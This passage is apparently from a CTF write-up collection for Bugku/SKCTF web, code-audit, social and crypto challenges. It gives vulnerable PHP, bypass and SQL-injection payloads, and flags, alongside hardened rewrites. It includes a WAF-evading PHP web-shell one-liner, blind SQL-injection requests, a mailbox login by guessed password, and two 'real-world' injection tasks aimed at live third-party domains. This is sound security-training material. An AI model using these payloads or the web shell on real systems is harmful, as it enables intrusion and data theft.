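// 2a. Hardened: forbid object instantiation. Scalars and arrays still round-trip; a class
//     payload becomes __PHP_Incomplete_Class, which we refuse before it can be converted.
function hardened_no_objects(string $password): string
{
    $val = unserialize($password, ['allowed_classes' => false]);
    if (is_object($val)) {
        return 'rejected: object payload';
    }
    return is_string($val) ? $val : 'rejected: not a string';
}

// 2b. Better: do not accept PHP-serialized data from clients at all; JSON has no classes.
function hardened_json(string $password): string
{
    $val = json_decode($password, true, 2, JSON_THROW_ON_ERROR);
    return is_string($val) ? $val : 'rejected: not a string';
}

echo vulnerable($payload);                  // flag{placeholder}   (the gadget fired)
echo hardened_no_objects($payload), "\n";   // rejected: object payload
echo hardened_no_objects(serialize('hello')), "\n"; // hello
echo hardened_json('"hello"'), "\n";        // hello

unlink($target);
```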
## login
http://47.93.190.246:49163/
Flag format: SKCTF{xxxxxxxxxxxxxxxxx}
Hint: SQL constraint attack
Register a user whose name is `admin 1` (admin, then padding spaces, then 1, so the value is longer than the column and is truncated to admin plus trailing spaces) with any password, then log in as admin with that password. SKCTF{4Dm1n_HaV3_GreAt_p0w3R}
Reference: http://www.freebuf.com/articles/web/124537.html
## Safedog-bypassing one-liner (过狗一句话)
http://120.24.86.145:8010/
Here is a one-liner that gets past Safedog:
```php
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>
```
The pieces reassemble into assert, which is then called on the s parameter:
```
view-source:http://120.24.86.145:8010/?s=var_dump(scandir('.'))
view-source:http://120.24.86.145:8010/?s=var_dump(file_get_contents('flag.txt'))
string(25) "BUGKU{bugku_web_009801_a}"
```
## maccms (苹果cms)
URL: http://120.24.86.145:8009/
## appcms
http://120.24.86.145:8012/
The flag is in the web root
## Xiaoming's blog (小明的博客)
http://120.24.86.145:9003/
Please don't damage the target
## All kinds of bypasses
All kinds of bypasses
http://120.24.86.145:8002/web7/
```php
<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
    if ($_GET['uname'] == $_POST['passwd'])
        print 'passwd can not be uname.';
    else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
        die('Flag: '.$flag);
    else
        print 'sorry!';
} ?>
```
Two different arrays are not == each other, but sha1() of either is NULL, and NULL === NULL passes even the strict comparison:
```
http://120.24.86.145:8002/web7/?uname[]=&id=margin
post passwd[]=1
Flag: flag{HACK_45hhs_213sDD}
```
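What md5(), sha1() and strcmp() return when handed an array, and the type check that closes the hole, as an added example that is not the challenges' code. It covers 前女友 (md5/strcmp with ==), 备份是个好习惯 (md5 with == and !==) and 各种绕过哟 (sha1 with ===) above; the request values are constructed.

```php
<?php
// Added example, not the challenges' code: array-valued request parameters turn the hash and
// compare functions into NULL on PHP 7 (with a warning) and into a TypeError on PHP 8.
declare(strict_types=1);

// 前女友: $v1 != $v2 holds for two different arrays, md5(array) == md5(array) is NULL == NULL,
// and !strcmp(array, string) is !NULL, i.e. true.
function weak_loose_compare($v1, $v2, $v3, string $flag): bool
{
    try {
        return $v1 != $v2 && @md5($v1) == @md5($v2) && !@strcmp($v3, $flag);
    } catch (TypeError $e) {          // PHP 8 refuses arrays outright
        return false;
    }
}

// 各种绕过哟: even === does not help, because sha1(array) is NULL on both sides.
function weak_strict_compare($uname, $passwd): bool
{
    try {
        return $uname != $passwd && @sha1($uname) === @sha1($passwd);
    } catch (TypeError $e) {
        return false;
    }
}

// Hardened: reject anything that is not a string before it reaches a hash or compare function,
// then compare with hash_equals() so that neither type juggling nor timing leaks apply.
function strict_compare($v1, $v2, $v3, string $flag): bool
{
    foreach ([$v1, $v2, $v3] as $v) {
        if (!is_string($v)) {
            return false;
        }
    }
    return $v1 !== $v2
        && hash_equals(md5($v1), md5($v2))
        && hash_equals($flag, $v3);
}

// Constructed request values: ?v1[]=&v2[]=1&v3[]=  and  ?uname[]=  with  passwd[]=1
$v1 = [''];
$v2 = ['1'];
$v3 = [''];
$flag = 'FLAG{placeholder}';

var_dump(weak_loose_compare($v1, $v2, $v3, $flag)); // bool(true) on PHP 7, bool(false) on PHP 8
var_dump(weak_strict_compare([''], ['1']));          // bool(true) on PHP 7, bool(false) on PHP 8
var_dump(strict_compare($v1, $v2, $v3, $flag));     // bool(false) on every version
var_dump(strict_compare('a', 'a', $flag, $flag));   // bool(false): identical inputs are refused
var_dump(strict_compare('s878926199a', 'QNKCDZO', $flag, $flag)); // bool(false): 0e digests differ byte-wise
```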
## WEB8
txt????
http://120.24.86.145:8002/web8/
```php
<?php
extract($_GET);
if (!empty($ac)){
    $f = trim(file_get_contents($fn));
    if ($ac === $f){
        echo "<p>This is flag:" ." $flag</p>";
    }
    else{
        echo "<p>sorry!</p>";
    }
}
?>
```
extract($_GET) turns every query parameter into a variable, so both $ac and the file path $fn are ours; with fn=php://input the request body is the "file":
```
http://120.24.86.145:8002/web8/?ac=findneo&fn=php://input
post findneo
This is flag: flag{3cfb7a90fc0de31}
```
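The extract() problem run offline with temporary files standing in for php://input, next to an explicit-parameter version, as an added example that is not WEB8's code; the request arrays, token files and flag value are constructed.

```php
<?php
// Added example, not WEB8's code: extract() on request data lets the client choose both the
// variable names and the file path; the hardened version reads only the parameters it expects.
declare(strict_types=1);

// The challenge's logic with $get standing in for $_GET.
function web8_weak(array $get, string $flag): string
{
    extract($get);                                  // creates $ac, $fn ... and can overwrite $flag
    if (!empty($ac)) {
        $f = trim((string)@file_get_contents($fn)); // path chosen by the client (php://input in the write-up)
        return $ac === $f ? "This is flag: $flag" : 'sorry!';
    }
    return '';
}

// Hardened: read the one expected parameter explicitly, compare it against a server-side value,
// and never derive a path or a variable name from the request.
function web8_hardened(array $get, string $flag, string $expectedTokenFile): string
{
    $ac = $get['ac'] ?? '';
    if (!is_string($ac) || $ac === '') {
        return '';
    }
    $expected = trim((string)file_get_contents($expectedTokenFile));
    return hash_equals($expected, $ac) ? "This is flag: $flag" : 'sorry!';
}

// Offline stand-ins: a server-side token file and a file whose contents the "client" controls.
$serverToken = tempnam(sys_get_temp_dir(), 'tok');
file_put_contents($serverToken, "s3cret\n");
$clientFile = tempnam(sys_get_temp_dir(), 'cli');
file_put_contents($clientFile, "findneo\n");
$flag = 'FLAG{placeholder}';

// The write-up's request shape: ac=findneo&fn=<client-controlled source>
$request = ['ac' => 'findneo', 'fn' => $clientFile];
echo web8_weak($request, $flag), "\n";                     // This is flag: FLAG{placeholder}
echo web8_hardened($request, $flag, $serverToken), "\n";   // sorry!

// extract() also lets the request clobber existing locals, here the function's own $flag.
echo web8_weak($request + ['flag' => 'owned'], $flag), "\n";   // This is flag: owned

unlink($serverToken);
unlink($clientFile);
```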
## Characters? Regex?
Characters? Regex?
http://120.24.86.145:8002/web10/
```php
<?php
highlight_file('2.php');
$key='KEY{********************************}';
$IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match);
if( $IM ){
    die('key is: '.$key);
}
?>
```
Any string that satisfies the pattern works:
```
http://120.24.86.145:8002/web10/?id=keykeyxxxxkey:/x/keyp[:punct:]
key is: KEY{0x0SIOPh550afc}
```
Attention to detail#
Address: http://120.24.86.145:8002/web13/
Find a way to become admin.
Scanning turns up robots.txt, which reveals /resusl.php. The page response contains `if ($_GET[x]==$password) foo`.
Visit /web13/resusl.php?x=admin to get flag(ctf_0098_lkji-s).
Code audit#
http://120.24.86.145:8002/web14/
The database isn't set up properly; don't attempt this one yet.

```php
<?php
include "config.php";
class HITCON{
    private $method;
    private $args;
    private $conn;
    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
        $this->__conn();
    }
    function show() {
        list($username) = func_get_args();
        $sql = sprintf("SELECT * FROM users WHERE username='%s'", $username);
        $obj = $this->__query($sql);
        if ( $obj != false ) {
            $this->__die( sprintf("%s is %s", $obj->username, $obj->role) );
        } else {
            $this->__die("Nobody Nobody But You!");
        }
    }
    function login() {
        global $FLAG;
        list($username, $password) = func_get_args();
        $username = strtolower(trim(mysql_escape_string($username)));
        $password = strtolower(trim(mysql_escape_string($password)));
        $sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password);
        if ( $username == 'orange' || stripos($sql, 'orange') != false ) {
            $this->__die("Orange is so shy. He do not want to see you.");
        }
        $obj = $this->__query($sql);
        if ( $obj != false && $obj->role == 'admin' ) {
            $this->__die("Hi, Orange! Here is your flag: " . $FLAG);
        } else {
            $this->__die("Admin only!");
        }
    }
    function source() {
        highlight_file(__FILE__);
    }
    function __conn() {
        global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
        if (!$this->conn)
            $this->conn = mysql_connect($db_host, $db_user, $db_pass);
        mysql_select_db($db_name, $this->conn);
        if ($DEBUG) {
            $sql = "CREATE TABLE IF NOT EXISTS users (
                username VARCHAR(64),
                password VARCHAR(64),
                role VARCHAR(64)
            ) CHARACTER SET utf8";
            $this->__query($sql, $back=false);
            $sql = "INSERT INTO users VALUES ('orange', '$db_pass', 'admin'), ('phddaa', 'ddaa', 'user')";
            $this->__query($sql, $back=false);
        }
        mysql_query("SET names utf8");
        mysql_query("SET sql_mode = 'strict_all_tables'");
    }
    function __query($sql, $back=true) {
        $result = @mysql_query($sql);
        if ($back) {
            return @mysql_fetch_object($result);
        }
    }
    function __die($msg) {
        $this->__close();
        header("Content-Type: application/json");
        die( json_encode( array("msg"=> $msg) ) );
    }
    function __close() {
        mysql_close($this->conn);
    }
    function __destruct() {
        $this->__conn();
        if (in_array($this->method, array("show", "login", "source"))) {
            @call_user_func_array(array($this, $this->method), $this->args);
        } else {
            $this->__die("What do you do?");
        }
        $this->__close();
    }
    function __wakeup() {
        foreach($this->args as $k => $v) {
            $this->args[$k] = strtolower(trim(mysql_escape_string($v)));
        }
    }
}
if(isset($_GET["data"])) {
    @unserialize($_GET["data"]);
} else {
    new HITCON("source", array());
}
```
Looking for getshell#
Looking for getshell
http://120.24.86.145:8002/web9/
flag.php#
Address: http://120.24.86.145:8002/flagphp/
Clicked login and nothing happened
Hint: hint
Following the hint, visit http://120.24.86.145:8002/flagphp/?hint=1

```php
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY") {
    echo "$flag";
}
else {
?>
<html>foo </html>
<?php
}
$KEY='ISecer:www.isecer.com';
?>
```
I had assumed that adding the key-value pair `ISecer:s:21:"ISecer:www.isecer.com";` to the request's Cookie header would do. But this one is interesting: at that point the value of $KEY is still empty, so the pair to add is `ISecer:s:0:"";`. flag{unserialize_by_virink}

```
<?php
var_dump($foo);
$foo='foo';
var_dump($foo);
var_dump($bar);
?>
<?php
$bar='bar';
var_dump($bar);
--------------- Output ----------
Notice: Undefined variable: foo in C:\Users\*\Desktop\tets.php on line 2
NULL
string(3) "foo"
Notice: Undefined variable: bar in C:\Users\*\Desktop\tets.php on line 5
NULL
string(3) "bar"
PHP Notice: Undefined variable: foo in C:\Users\*\Desktop\tets.php on line 2
PHP Notice: Undefined variable: bar in C:\Users\*\Desktop\tets.php on line 5
```
INSERT INTO injection#
Address: http://120.24.86.145:8002/web15/
Flag format: flag{xxxxxxxxxxxx}
Why not write a Python script?

```php
<?php
error_reporting(0);
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
```
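The snippet above trusts X-Forwarded-For and splices it straight into the INSERT. The following is an added example (mine, not the challenge source): the same logging logic with the forwarded address validated as an IP literal and the row written through a PDO bound parameter; the DSN and credentials are placeholders.

```php
<?php
// Added example (not the challenge source): the same IP-logging logic with the
// forwarded address validated and the INSERT issued through a bound parameter.

// Return the first X-Forwarded-For hop only if it parses as an IP literal;
// otherwise fall back to the TCP peer address, or to null if that fails too.
function getClientIp(array $server): ?string
{
    $candidates = [];
    if (isset($server['HTTP_X_FORWARDED_FOR'])) {
        // The header may carry a comma-separated chain; the first hop is the
        // claimed client. It is client-controlled, hence the validation below.
        $candidates[] = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
    }
    if (isset($server['REMOTE_ADDR'])) {
        $candidates[] = $server['REMOTE_ADDR'];
    }
    foreach ($candidates as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP) !== false) {
            return $ip;
        }
    }
    return null;
}

// A bound parameter keeps the value out of the SQL text, so quotes, comment
// sequences or function calls inside it are stored as data, never executed.
function storeClientIp(PDO $pdo, string $ip): void
{
    $stmt = $pdo->prepare('INSERT INTO client_ip (ip) VALUES (:ip)');
    $stmt->execute([':ip' => $ip]);
}

// Constructed request: a non-IP first hop followed by a valid peer address.
$fakeServer = [
    'HTTP_X_FORWARDED_FOR' => "not-an-address', 203.0.113.7",
    'REMOTE_ADDR'          => '198.51.100.9',
];
$ip = getClientIp($fakeServer);   // the crafted hop fails validation; REMOTE_ADDR is used
var_dump($ip);

// Connection details are placeholders; disable emulated prepares so the
// server itself separates statement and parameters.
// $pdo = new PDO('mysql:host=localhost;dbname=DB_NAME', 'DB_USER', 'DB_PASS', [
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//     PDO::ATTR_EMULATE_PREPARES => false,
// ]);
// if ($ip !== null) {
//     storeClientIp($pdo, $ip);
// }
```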
File inclusion 2#
http://47.93.190.246:49166/
Flag format: SKCTF{xxxxxxxxxxxxxxxx}
Hint: file inclusion
Redirects to /index.php?file=hello.php; the response headers hint at include.php, and a comment hints at upload.php.

```
403
http://47.93.190.246:49166/admin.phps
http://47.93.190.246:49166/index.phps
http://47.93.190.246:49166/login.phps
http://47.93.190.246:49166/.htaccess
301
http://47.93.190.246:49166/upload
200
http://47.93.190.246:49166/upload.php
```
Real-world 2 - injection#
http://www.kabelindo.co.id
Flag format: flag{name of the last table in the database}
This is a magical login box#
http://120.24.86.145:9001/sql/
Flag format: flag{}
http://120.24.86.145:9004
This challenge has 2 flags
Flag format: flag{}

```
http://120.24.86.145:9004/1ndex.php?id=5%27||ascii(mid(database(),1,1))=ascii(%27w%27)--+
GET /1ndex.php?id=5%27||ascii(mid(database(),1,1))=119--+
''.join(map(chr,[119,101,98,49,48,48,50,45,49]))
'web1002-1'
http://120.24.86.145:9004/1ndex.php?id=5%27||ascii(mid(database(),1,1))%3E0--+
bingo="There is nothing"
ohno="You can do some SQL injection in here"
http://120.24.86.145:9004/1ndex.php?id=1%27||if(ascii(mid(select%20%22asdf%22,1,1))%3E0,sleep(10),0)--+
```
SQL injection 2#
http://120.24.86.145:8007/web2/
Everything is damn well filtered, feeling hopeless?
Hint: !,!=,=,+,-,^,%
wordpress#
http://wp.bugku.com/
Setting this challenge took 10 minutes, so it should be easy;
go into the site, take a look and you will understand.
It requires the first step of penetration testing: information gathering.
login2#
http://47.93.190.246:49165/
SKCTF{xxxxxxxxxxxxxxxxxxxxx}
Hint: union, command execution
Source: 山科大
login3#
http://47.93.190.246:49167/
Flag format: SKCTF{xxxxxxxxxxxxx}
Hint: boolean-based blind SQL injection
Source: 山科大
Error-based injection#
http://103.238.227.13:10088/
FLAG format: Flag:""
Real-world 1 - injection#
http://www.interplay.com
Flag format: flag{name of the first table in the database}
Trim's diary#
http://120.24.86.145:9002/
Hint: don't give up after just one try
login4#
http://47.93.190.246:49168/
Flag format: SKCTF{xxxxxxxxxxxxxxxx}
Hint: CBC byte-flipping attack
Source: 山科大
Social#
Password???#
Name: 张三
Birthday: 19970315
KEY format: KEY{xxxxxxxxxx}
KEY{zs19970315}
Information lookup???#
Basic social engineering challenge: information lookup
I hear bugku.cn can be found on 今日头条 (Toutiao)??
Hint: the flag is the group number
Format: KEY{xxxxxxxxxxx}
Visit https://www.google.com/search?q=bugku.cn+site%3Atoutiao.com to get 462713425.
Beginner challenge, social engineering master?#
name: 孤长离
Hint: weak password
Searching for 孤长离 leads to a Tieba forum; logging in to the mailbox bkctftest@163.com with the weak password gives KEY{sg1H78Si9C0s99Q}.
A simple social engineering attempt#
This dog was drawn by me and is used as an avatar;
the hint for this challenge is actually very obvious.
Think about it.
A Google reverse image search leads to https://github.com/bugku, then to https://weibo.com/bugku, then to http://c.bugku.com/13211.txt, which gives flag{BUku_open_shgcx1}.
Crypto#
Tick~tock#
-... -.- -.-. - ..-. -- .. ... -.-.
Answer format: KEY{xxxxxxxxx}
key{bkctfmisc}
Recommended: this little tool
Clever little sheep#
A little sheep jumped over 2 fences
KYsd3js2E{a2jda}
KEY{sad23jjdsa2}
Recommended: this little tool
Ook! deobfuscation
flag{ok-ctf-1234-admin}
This is not Morse code#
Brainfuck deobfuscation
flag{ok-c2tf-3389-admin}
+[]-#
Brainfuck deobfuscation
flag{bugku_jiami_23}
Fake zip encryption#
Change the sixth byte to 00. flag{Adm1N-B2G-kU-SZIP}
Code audit#
md5() function#
http://120.24.86.145:9009/18.php

```php
<?php
error_reporting(0);
$flag = 'flag{test}';
if (isset($_GET['username']) and isset($_GET['password'])) {
    if ($_GET['username'] == $_GET['password'])
        print 'Your password can not be your username.';
    else if (md5($_GET['username']) === md5($_GET['password']))
        die('Flag: '.$flag);
    else
        print 'Invalid password';
}
?>
```
http://120.24.86.145:9009/18.php?username[]=1&password[]=
Flag: flag{bugk1u-ad8-3dsa-2}
http://120.24.86.145:9009/1.php

```php
<?php
$flag='xxx';
extract($_GET);
if(isset($shiyan))
{
    $content=trim(file_get_contents($flag));
    if($shiyan==$content)
    {
        echo'flag{xxx}';
    }
    else
    {
        echo'Oh.no';
    }
}
?>
```
strcmp string comparison#
http://120.24.86.145:9009/6.php

```php
<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
    if (strcmp($_GET['a'], $flag) == 0) // returns < 0 if str1 is less than str2, > 0 if str1 is greater than str2, and 0 if they are equal
        // compares two strings (case-sensitive)
        die('Flag: '.$flag);
    else
        print 'No';
}
?>
```
http://120.24.86.145:9009/6.php?a[]
Flag: flag{bugku_dmsj_912k}
urldecode double-encoding bypass#
http://120.24.86.145:9009/10.php

```php
<?php
if(eregi("hackerDJ",$_GET[id])) {
    echo("
not allowed!
");
    exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
    echo "
Access granted!
";
    echo "
flag
";
}
?>
```
http://120.24.86.145:9009/10.php?id=hackerD%254a
flag{bugku__daimasj-1t2}
Array returns NULL bypass#
http://120.24.86.145:9009/19.php

```php
<?php
$flag = "flag";
if (isset ($_GET['password'])) {
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo 'You password must be alphanumeric';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die('Flag: ' . $flag);
    else
        echo 'Invalid password';
}
?>
```
http://120.24.86.145:9009/19.php?password=a%00--
flag{ctf-bugku-ad-2131212}
Weak-typed integer comparison bypass#
http://120.24.86.145:9009/22.php

```php
<?php
// $flag is defined elsewhere in the challenge source
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
    echo $flag;
}
?>
```
http://120.24.86.145:9009/22.php?password=1337x
flag{bugku_null_numeric}
sha() function comparison bypass#
http://120.24.86.145:9009/7.php

```php
<?php
$flag = "flag";
if (isset($_GET['name']) and isset($_GET['password']))
{
    var_dump($_GET['name']);
    echo "
";
    var_dump($_GET['password']);
    var_dump(sha1($_GET['name']));
    var_dump(sha1($_GET['password']));
    if ($_GET['name'] == $_GET['password'])
        echo '
Your password can not be your name!
';
    else if (sha1($_GET['name']) === sha1($_GET['password']))
        die('Flag: '.$flag);
    else
        echo '
Invalid password.
';
}
else
    echo '
Login first!
';
?>
```
http://120.24.86.145:9009/7.php?name[]&password[]=1
flag{bugku--daimasj-a2}
md5 hash equality bypass#
http://120.24.86.145:9009/13.php

```php
<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
    if ($a != 'QNKCDZO' && $md51 == $md52) {
        echo "flag{*}";
    } else {
        echo "false!!!";
    }
}
else{echo "please input a";}
?>
```
http://120.24.86.145:9009/13.php?a=240610708
flag{bugku-dmsj-am9ls}
Hexadecimal vs number comparison#
http://120.24.86.145:9009/20.php

```php
<?php
error_reporting(0);
function noother_says_correct($temp)
{
    $flag = 'flag{test}';
    $one = ord('1'); // ord — returns the ASCII value of a character
    $nine = ord('9'); // ord — returns the ASCII value of a character
    $number = '3735929054';
    // Check all the input characters!
    for ($i = 0; $i < strlen($number); $i++)
    {
        // Disallow all the digits!
        $digit = ord($temp{$i});
        if ( ($digit >= $one) && ($digit <= $nine) )
        {
            // Aha, digit not allowed!
            return "flase";
        }
    }
    if($number == $temp)
        return $flag;
}
$temp = $_GET['password'];
echo noother_says_correct($temp);
?>
```
http://120.24.86.145:9009/20.php?password=0xdeadc0de
flag{Bugku-admin-ctfdaimash}
ereg regex %00 truncation#
http://120.24.86.145:9009/5.php

```php
<?php
$flag = "xxx";
if (isset ($_GET['password']))
{
    if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
    {
        echo 'You password must be alphanumeric';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos ($_GET['password'], '*-*') !== FALSE) // strpos — finds the position of the first occurrence of a substring
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('- have not been found');
        }
    }else{
        echo 'Invalid password';
    }
}
?>
```

```
http://120.24.86.145:9009/5.php?password=9e9%00*-*
```
flag{bugku-dm-sj-a12JH8}
strpos array bypass#
http://120.24.86.145:9009/15.php

```php
<?php
$flag = "flag";
if (isset ($_GET['ctf'])) {
    if (@ereg ("^[1-9]+$", $_GET['ctf']) === FALSE)
        echo '必须输入数字才行';
    else if (strpos ($_GET['ctf'], '#biubiubiu') !== FALSE)
        die('Flag: '.$flag);
    else
        echo '骚年,继续努力吧啊~';
}
?>
```
http://120.24.86.145:9009/15.php?ctf=1%00%23biubiubiu
or
http://120.24.86.145:9009/15.php?ctf[]
flag{Bugku-D-M-S-J572}
Numeric validation regex bypass#
http://120.24.86.145:9009/21.php

```php
<?php
error_reporting(0);
$flag = 'flag{test}';
if ("POST" == $_SERVER['REQUEST_METHOD'])
{
    $password = $_POST['password'];
    if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password)) // preg_match — perform a regular expression match
    {
        echo 'flag';
        exit;
    }
    while (TRUE)
    {
        $reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
        if (6 > preg_match_all($reg, $password, $arr))
            break;
        $c = 0;
        $ps = array('punct', 'digit', 'upper', 'lower'); // [[:punct:]] any punctuation, [[:digit:]] any digit, [[:upper:]] any uppercase letter, [[:lower:]] any lowercase letter
        foreach ($ps as $pt)
        {
            if (preg_match("/[[:$pt:]]+/", $password))
                $c += 1;
        }
        if ($c < 3) break;
        // $c >= 3: the password must contain at least three of the four character classes
        if ("42" == $password) echo $flag;
        else echo 'Wrong password';
        exit;
    }
}
?>
```
flag{Bugku_preg_match}
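The md5(), sha(), strcmp, md5-equality, weak-typed integer and ereg/strpos challenges in this section all fail on a handful of PHP coercion rules. The following added example (mine, not from the challenges or Bugku) puts each weak comparison beside a version that does not coerce: string-only inputs, hash_equals(), FILTER_VALIDATE_INT, and preg_match() with the D modifier in place of ereg(); the inputs at the bottom are constructed from the payloads above.

```php
<?php
// Added example (not from the challenges): each coercion this section exploits,
// beside a check that is immune to it. Constructed inputs follow the payloads above.
// 1. md5()/sha1()/strcmp() given an array return NULL on PHP 5/7 (with a warning;
//    PHP 8 throws a TypeError), so two different arrays hash "equal" under ===.
//    Refuse anything that is not a string before hashing.
function weakHashCompare($a, $b): bool
{
    return $a != $b && @md5($a) === @md5($b);
}
function strictHashCompare($a, $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;                       // arrays and NULL never authenticate
    }
    return $a !== $b && hash_equals(md5($a), md5($b));
}

// 2. md5('QNKCDZO') and md5('240610708') are both "0e" plus digits, so == parses
//    them as the float 0.0 and calls them equal. hash_equals() compares bytes.
function looseDigestEquals(string $known, string $candidate): bool
{
    return md5($known) == md5($candidate);
}
function strictDigestEquals(string $known, string $candidate): bool
{
    return hash_equals(md5($known), md5($candidate));
}

// 3. !is_numeric("1337x") is true, yet "1337x" > 1336 is also true because the
//    comparison coerces the string. Validate as an integer, then compare integers.
function strictNumericGate(string $password): bool
{
    $n = filter_var($password, FILTER_VALIDATE_INT);
    return $n !== false && $n > 1336;
}

// 4. ereg() read its input as a C string and stopped at the first NUL byte, so
//    "a\0--" passed ^[a-zA-Z0-9]+$. preg_match() is binary-safe; the D modifier
//    keeps $ from matching before a trailing newline.
function strictAlnum(string $s): bool
{
    return preg_match('/^[a-zA-Z0-9]+$/D', $s) === 1;
}

var_dump(strictHashCompare(['1'], ['2']));                       // array inputs are rejected
var_dump(looseDigestEquals('QNKCDZO', '240610708'), strictDigestEquals('QNKCDZO', '240610708'));
var_dump(strictNumericGate('1337x'), strictNumericGate('1337'));
var_dump(strictAlnum("a\0--"), strictAlnum('abc123'));
```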